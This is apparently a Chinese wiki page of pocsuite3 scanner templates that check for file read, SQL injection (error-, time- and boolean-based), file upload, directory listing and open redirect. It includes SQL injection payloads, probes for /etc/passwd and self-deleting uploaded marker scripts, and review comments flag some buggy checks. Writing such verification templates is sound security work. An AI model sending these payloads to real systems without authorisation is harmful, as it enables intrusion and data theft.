POC常见漏洞模板
ice-doom edited this page May 7, 2021
先说明一下已准备好的模块 make_verify_url,该模块用于限制漏洞路径。
from plugin.pocsuite3.thirdparty.eyeJo import make_verify_url
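url = 'http://192.168.1.1/data/'
# mod=0: the given path replaces everything after the host (the '/data/'
# prefix is dropped); mod=1: the path is appended to the URL as given.
# The plain string literals replace the original f'...' prefixes, which had
# no placeholders and therefore did nothing.
vulurl1 = make_verify_url(url, '/vul.php', mod=0)
vulurl2 = make_verify_url(url, '/vul.php', mod=1)
## vulurl1:http://192.168.1.1/vul.php
## vulurl2:http://192.168.1.1/data/vul.php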
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from plugin.pocsuite3.api import Output, POCBase, register_poc, requests
from plugin.pocsuite3.thirdparty.eyeJo import parse_ip_port, make_verify_url
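class TestPOC(POCBase):
    """POC template: file-read check.

    Requests ``/vul.php`` once per well-known local file path and treats a
    200 response whose body contains that file's characteristic markers as
    a positive result.
    """

    # Framework metadata; the empty triple-quoted strings are placeholders
    # to be filled in per POC.
    vulID = ''''''
    cveID = ''''''
    cnvdID = ''''''
    cnnvdID = ''''''
    version = ''''''
    author = ''''''
    vulDate = ''''''
    createDate = ''''''
    updateDate = ''''''
    name = '''xxxx存在xxx漏洞'''
    desc = ''''''
    severity = '''medium'''
    vulType = ''''''
    taskType = '''app-vul'''
    references = ['''''']
    appName = ''''''
    appVersion = ''''''
    appPowerLink = ''''''
    samples = ['''''']
    install_requires = ['''''']

    def _verify(self):
        """Probe each path in turn; stop at the first match.

        Returns the framework ``Output`` built by ``parse_output``. ``result``
        carries ``VerifyInfo`` (URL, port) only when a response matched.
        """
        result = {}
        self.url, _ip, port = parse_ip_port(self.target, 80)
        # Raw string: the original wrote '\w' and '\s' inside a normal literal.
        # Those are invalid escapes (a SyntaxWarning on Python 3.12+) that only
        # yielded the intended backslashes by accident.
        probes = ['/etc/passwd', r'c:\windows\system.ini']
        for probe in probes:
            vulurl = make_verify_url(self.url, f'/vul.php?param={probe}', mod=0)
            resp = requests.get(vulurl, verify=False, timeout=15)
            if resp.status_code != 200:
                continue
            body = resp.content
            unix_hit = b'root:' in body and b'nobody:' in body and b'/bin' in body
            win_hit = b'for 16-bit' in body
            if unix_hit or win_hit:
                result['VerifyInfo'] = {'URL': resp.url, 'port': port}
                break
        return self.parse_output(result)

    # Attack mode performs exactly the same request as verify mode.
    _attack = _verify

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if not result:
            output.fail('Internet nothing returned')
            return output
        output.success(result)
        return output


register_poc(TestPOC)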
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from plugin.pocsuite3.api import Output, POCBase, register_poc, requests
from plugin.pocsuite3.thirdparty.eyeJo import parse_ip_port, make_verify_url
class TestPOC(POCBase):
    """POC template: error-based SQL injection check.

    The payload embeds ``md5(1)`` between ``0x7e`` delimiters; a 500
    response whose body contains the resulting marker is a positive result.
    """

    # Framework metadata; the empty triple-quoted strings are placeholders
    # to be filled in per POC.
    vulID = ''''''
    cveID = ''''''
    cnvdID = ''''''
    cnnvdID = ''''''
    version = ''''''
    author = ''''''
    vulDate = ''''''
    createDate = ''''''
    updateDate = ''''''
    name = '''xxxx存在xxx漏洞'''
    desc = ''''''
    severity = '''high'''
    vulType = ''''''
    taskType = '''app-vul'''
    references = ['''''']
    appName = ''''''
    appVersion = ''''''
    appPowerLink = ''''''
    samples = ['''''']
    install_requires = ['''''']

    def _verify(self):
        """Single GET; report success only on marker + HTTP 500."""
        result = {}
        self.url, _ip, port = parse_ip_port(self.target, 80)
        vulurl = make_verify_url(self.url, "/vul.php?param=' AND updatexml(1,concat(0x7e,md5(1),0x7e),1)-- -", mod=0)
        resp = requests.get(vulurl, verify=False, timeout=15)
        # The marker is a 31-character prefix of the md5(1) digest (compare the
        # full digest used by the upload template), presumably because the
        # error text is truncated — confirm against a real response.
        marker_found = b'~c4ca4238a0b923820dcc509a6f75849' in resp.content
        if marker_found and resp.status_code == 500:
            result['VerifyInfo'] = {'URL': resp.url, 'port': port}
        return self.parse_output(result)

    # Attack mode performs exactly the same request as verify mode.
    _attack = _verify

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if not result:
            output.fail('Internet nothing returned')
            return output
        output.success(result)
        return output


register_poc(TestPOC)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from plugin.pocsuite3.api import Output, POCBase, register_poc, requests
from plugin.pocsuite3.thirdparty.eyeJo import parse_ip_port, make_verify_url
class TestPOC(POCBase):
    """POC template: error-based SQL injection check.

    The payload embeds ``md5(123)`` between ``0x7e7e7e`` delimiters; a 500
    response whose body contains the delimited digest is a positive result.
    """

    # Framework metadata; the empty triple-quoted strings are placeholders
    # to be filled in per POC.
    vulID = ''''''
    cveID = ''''''
    cnvdID = ''''''
    cnnvdID = ''''''
    version = ''''''
    author = ''''''
    vulDate = ''''''
    createDate = ''''''
    updateDate = ''''''
    name = '''xxxx存在xxx漏洞'''
    desc = ''''''
    severity = '''high'''
    vulType = ''''''
    taskType = '''app-vul'''
    references = ['''''']
    appName = ''''''
    appVersion = ''''''
    appPowerLink = ''''''
    samples = ['''''']
    install_requires = ['''''']

    def _verify(self):
        """Single GET; report success only on marker + HTTP 500."""
        result = {}
        self.url, _ip, port = parse_ip_port(self.target, 80)
        vulurl = make_verify_url(self.url, "/vul.php?param=-1 OR (SELECT 7916 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,md5(123),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)", mod=0)
        resp = requests.get(vulurl, verify=False, timeout=15)
        # ``~~~`` is the decoded 0x7e7e7e delimiter from the payload.
        expected = b'~~~202cb962ac59075b964b07152d234b70~~~'
        if expected in resp.content and resp.status_code == 500:
            result['VerifyInfo'] = {'URL': resp.url, 'port': port}
        return self.parse_output(result)

    # Attack mode performs exactly the same request as verify mode.
    _attack = _verify

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if not result:
            output.fail('Internet nothing returned')
            return output
        output.success(result)
        return output


register_poc(TestPOC)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from plugin.pocsuite3.api import Output, POCBase, register_poc, requests
from plugin.pocsuite3.thirdparty.eyeJo import parse_ip_port, make_verify_url
class TestPOC(POCBase):
    """POC template: time-based SQL injection check.

    Two POSTs differ only in a ``WAITFOR DELAY`` of 0 vs 5 seconds; the
    second must take at least 4.5 s longer than the first to count as a hit.
    """

    # Framework metadata; the empty triple-quoted strings are placeholders
    # to be filled in per POC.
    vulID = ''''''
    cveID = ''''''
    cnvdID = ''''''
    cnnvdID = ''''''
    version = ''''''
    author = ''''''
    vulDate = ''''''
    createDate = ''''''
    updateDate = ''''''
    name = '''xxxx存在xxx漏洞'''
    desc = ''''''
    severity = '''high'''
    vulType = ''''''
    taskType = '''app-vul'''
    references = ['''''']
    appName = ''''''
    appVersion = ''''''
    appPowerLink = ''''''
    samples = ['''''']
    install_requires = ['''''']

    def _verify(self):
        """Baseline request first; the delayed request is sent only if the
        baseline returned 200 with the expected body marker."""
        result = {}
        self.url, _ip, port = parse_ip_port(self.target, 80)
        data1 = "user=admin ' WAITFOR DELAY '0:0:0'-- aael&pass=123456"
        data2 = "user=admin ' WAITFOR DELAY '0:0:5'-- aael&pass=123456"
        vulurl = make_verify_url(self.url, "/vul.php", mod=0)

        baseline = requests.post(vulurl, data=data1, verify=False, timeout=15)
        baseline_seconds = baseline.elapsed.total_seconds()
        # b'xxxxxxx' is a template placeholder for an application-specific
        # marker that must appear in the normal response.
        if baseline.status_code != 200 or b'xxxxxxx' not in baseline.content:
            return self.parse_output(result)

        delayed = requests.post(vulurl, data=data2, verify=False, timeout=15)
        delayed_seconds = delayed.elapsed.total_seconds()
        if delayed.status_code == 200 and delayed_seconds - baseline_seconds >= 4.5:
            result['VerifyInfo'] = {'URL': delayed.url, 'port': port}
        return self.parse_output(result)

    # Attack mode performs exactly the same requests as verify mode.
    _attack = _verify

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if not result:
            output.fail('Internet nothing returned')
            return output
        output.success(result)
        return output


register_poc(TestPOC)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from plugin.pocsuite3.api import Output, POCBase, register_poc, requests
from plugin.pocsuite3.thirdparty.eyeJo import parse_ip_port, make_verify_url
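class TestPOC(POCBase):
    """POC template: boolean-based SQL injection check.

    A control request (referencing table ``admin1``, presumably absent)
    must produce an error page; the real request (table ``admin``) must
    then return 200 without any of the error markers.
    """

    # Framework metadata; the empty triple-quoted strings are placeholders
    # to be filled in per POC.
    vulID = ''''''
    cveID = ''''''
    cnvdID = ''''''
    cnnvdID = ''''''
    version = ''''''
    author = ''''''
    vulDate = ''''''
    createDate = ''''''
    updateDate = ''''''
    name = '''xxxx存在xxx漏洞'''
    desc = ''''''
    severity = '''high'''
    vulType = ''''''
    taskType = '''app-vul'''
    references = ['''''']
    appName = ''''''
    appVersion = ''''''
    appPowerLink = ''''''
    samples = ['''''']
    install_requires = ['''''']

    def _verify(self):
        """Control request first; the real request only if the control errored.

        Returns the framework ``Output`` built by ``parse_output``.
        """
        result = {}
        self.url, _ip, port = parse_ip_port(self.target, 80)
        vul_url = make_verify_url(self.url, "/vul.asp?param=1' AND EXISTS(SELECT * FROM admin) AND 'zigJ'='zigJ", mod=0)
        chec_vul_url = make_verify_url(self.url, "/vul.asp?param=1' AND EXISTS(SELECT * FROM admin1) AND 'zigJ'='zigJ", mod=0)
        # b'xxxx' in the first marker is a template placeholder.
        error_markers = (b'<font face="xxxx" size=2>', b'<fieldset>')

        resp_chec = requests.get(chec_vul_url, verify=False, timeout=15)
        control_errored = any(m in resp_chec.content for m in error_markers)
        if resp_chec.status_code == 500 and control_errored:
            resp = requests.get(vul_url, verify=False, timeout=15)
            # Fixed: the original joined the two "not in" tests with `or`, which
            # is already true when just one marker is missing. The mirror of the
            # control condition above is "neither marker present".
            real_errored = any(m in resp.content for m in error_markers)
            if resp.status_code == 200 and not real_errored:
                result['VerifyInfo'] = {'URL': resp.url, 'port': port}
        return self.parse_output(result)

    # Attack mode performs exactly the same requests as verify mode.
    _attack = _verify

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if not result:
            output.fail('Internet nothing returned')
            return output
        output.success(result)
        return output


register_poc(TestPOC)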
以下为用于上传测试的文件,访问后即自行删除
php:
<?php echo md5(1);unlink(__FILE__);?>
aspx:
<%@ Page Language="Jscript"%>
<%
// Upload marker: writes "test" and deletes the fixed path ./shell.aspx.
// NOTE(review): the jsp/ashx samples delete the file that served the
// request; this one deletes a hard-coded name, so if the two differ the
// test file is left behind — confirm intent.
Response.Write("test");
System.IO.File.Delete(Server.MapPath("./shell.aspx"));
%>
jsp:
<%
// Upload marker: decodes a fixed base64 string to a 32-character hex marker,
// prints it, then deletes the file that served this request.
// NOTE(review): sun.misc.BASE64Decoder is an internal JDK class that is not
// available on newer JDKs; java.util.Base64 is the supported equivalent.
out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer("ZTE2NTQyMTExMGJhMDMwOTlhMWMwMzkzMzczYzViNDM=")));
new java.io.File(application.getRealPath(request.getServletPath())).delete();
%>
ashx:
<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
<%@ import Namespace="System.IO"%>
<script runat="server">
    // Upload marker: writes the lowercase MD5 digest of "996" and deletes the
    // physical file that served this request.
    // NOTE(review): labelled "ashx" above, but this is a @Page directive
    // (aspx-style page), not a handler directive — confirm the intended
    // file extension.
    protected void Page_load(object sender,EventArgs e)
    {
        Response.Write(FormsAuthentication.HashPasswordForStoringInConfigFile("996","MD5").ToLower());
        File.Delete(Request.PhysicalPath);
    }
</script>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from plugin.pocsuite3.api import Output, POCBase, register_poc, requests, random_str
from plugin.pocsuite3.thirdparty.eyeJo import parse_ip_port, make_verify_url
class TestPOC(POCBase):
    """POC template: file upload check.

    Posts a self-deleting PHP marker file to ``/vul.php`` and then fetches
    it back from ``/upload/``; the response must contain the md5(1) digest.
    """

    # Framework metadata; the empty triple-quoted strings are placeholders
    # to be filled in per POC.
    vulID = ''''''
    cveID = ''''''
    cnvdID = ''''''
    cnnvdID = ''''''
    version = ''''''
    author = ''''''
    vulDate = ''''''
    createDate = ''''''
    updateDate = ''''''
    name = '''xxxx存在xxx漏洞'''
    desc = ''''''
    severity = '''high'''
    vulType = ''''''
    taskType = '''app-vul'''
    references = ['''''']
    appName = ''''''
    appVersion = ''''''
    appPowerLink = ''''''
    samples = ['''''']
    install_requires = ['''''']

    def _verify(self):
        """Upload the marker, then request it; returns ``parse_output(result)``."""
        result = {}
        self.url, ip, port = parse_ip_port(self.target, 80)
        filename = f'{random_str(5)}.php'
        shell = "<?php echo md5(1);unlink(__FILE__);?>"
        # NOTE(review): the third element of a ``files`` tuple is the content
        # type itself; the 'Content-Type:' prefix here looks like a header
        # name that does not belong in the value — confirm.
        files = {'file': ('1.php', shell, 'Content-Type:application/octet-stream')}
        payload_url = make_verify_url(self.url, '/vul.php', mod=0)
        requests.post(payload_url, files=files, verify=False, timeout=15)
        # NOTE(review): ``filename`` is never sent — the multipart part above
        # is named '1.php' — so this URL does not correspond to the upload.
        shell_url = '{url}/upload/{name}'.format(url=self.url, name=filename)
        shell_resp = requests.get(shell_url, verify=False, timeout=15)
        # NOTE(review): ``resp.content`` is bytes; testing a str against it
        # raises TypeError, so this branch can never succeed as written (the
        # sibling templates use b'...' markers).
        if shell_resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in shell_resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = shell_url
            result['VerifyInfo']['port'] = port
        return self.parse_output(result)

    # Attack mode performs exactly the same requests as verify mode.
    _attack = _verify

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register_poc(TestPOC)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from plugin.pocsuite3.api import Output, POCBase, register_poc, requests
from plugin.pocsuite3.thirdparty.eyeJo import parse_ip_port, make_verify_url
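class TestPOC(POCBase):
    """POC template: directory listing check.

    Requests ``/unauth/`` without following redirects and treats a 200
    response that looks like an IIS-style index page (parent-directory link
    plus the " - /unauth/" title fragment) as a positive result.
    """

    # Framework metadata; the empty triple-quoted strings are placeholders
    # to be filled in per POC.
    vulID = ''''''
    cveID = ''''''
    cnvdID = ''''''
    cnnvdID = ''''''
    version = ''''''
    author = ''''''
    vulDate = ''''''
    createDate = ''''''
    updateDate = ''''''
    name = '''xxxx存在xxx漏洞'''
    desc = ''''''
    severity = '''high'''
    vulType = ''''''
    taskType = '''app-vul'''
    references = ['''''']
    appName = ''''''
    appVersion = ''''''
    appPowerLink = ''''''
    samples = ['''''']
    install_requires = ['''''']

    def _verify(self):
        """Single GET; returns the framework ``Output`` built by ``parse_output``."""
        result = {}
        self.url, _ip, port = parse_ip_port(self.target, 80)
        vul_url = make_verify_url(self.url, '/unauth/', mod=0)
        # timeout added: every other template bounds its requests; without it
        # a stalled host blocks the scan indefinitely.
        resp = requests.get(vul_url, verify=False, allow_redirects=False, timeout=15)
        body = resp.content
        # Either the English or the Chinese parent-directory label is accepted.
        has_parent_link = b"[To Parent Directory]" in body or b'[转到父目录]' in body
        if resp.status_code == 200 and has_parent_link and b" - /unauth/" in body:
            result['VerifyInfo'] = {'URL': resp.url, 'port': port}
        return self.parse_output(result)

    # Attack mode performs exactly the same request as verify mode.
    _attack = _verify

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if not result:
            output.fail('Internet nothing returned')
            return output
        output.success(result)
        return output


register_poc(TestPOC)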
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from plugin.pocsuite3.api import Output, POCBase, register_poc, requests
from plugin.pocsuite3.thirdparty.eyeJo import parse_ip_port, make_verify_url
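class TestPOC(POCBase):
    """POC template: open redirect check.

    Requests ``/vul.php?redirect=<url>`` without following redirects; a 302
    whose ``Location`` header equals the supplied URL is a positive result.
    """

    # Framework metadata; the empty triple-quoted strings are placeholders
    # to be filled in per POC.
    vulID = ''''''
    cveID = ''''''
    cnvdID = ''''''
    cnnvdID = ''''''
    version = ''''''
    author = ''''''
    vulDate = ''''''
    createDate = ''''''
    updateDate = ''''''
    name = '''xxxx存在xxx漏洞'''
    desc = ''''''
    severity = '''high'''
    vulType = ''''''
    taskType = '''app-vul'''
    references = ['''''']
    appName = ''''''
    appVersion = ''''''
    appPowerLink = ''''''
    samples = ['''''']
    install_requires = ['''''']

    def _verify(self):
        """Single GET; returns the framework ``Output`` built by ``parse_output``."""
        result = {}
        self.url, _ip, port = parse_ip_port(self.target, 80)
        verify_url = make_verify_url(self.url, "/vul.php?redirect=https://www.baidu.com", mod=0)
        # timeout added for consistency with the other templates; without it a
        # stalled host blocks the scan indefinitely.
        resp = requests.get(verify_url, allow_redirects=False, timeout=15)
        # The original indexed resp.headers['Location'] before checking the
        # status, so any non-redirect response (no Location header) raised
        # KeyError instead of producing a clean negative. Check the status
        # first and use .get() so a missing header simply fails to match.
        location = resp.headers.get('Location')
        if resp.status_code == 302 and location == "https://www.baidu.com":
            result['VerifyInfo'] = {'URL': resp.url, 'port': port}
        return self.parse_output(result)

    # Attack mode performs exactly the same request as verify mode.
    _attack = _verify

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if not result:
            output.fail('Internet nothing returned')
            return output
        output.success(result)
        return output


register_poc(TestPOC)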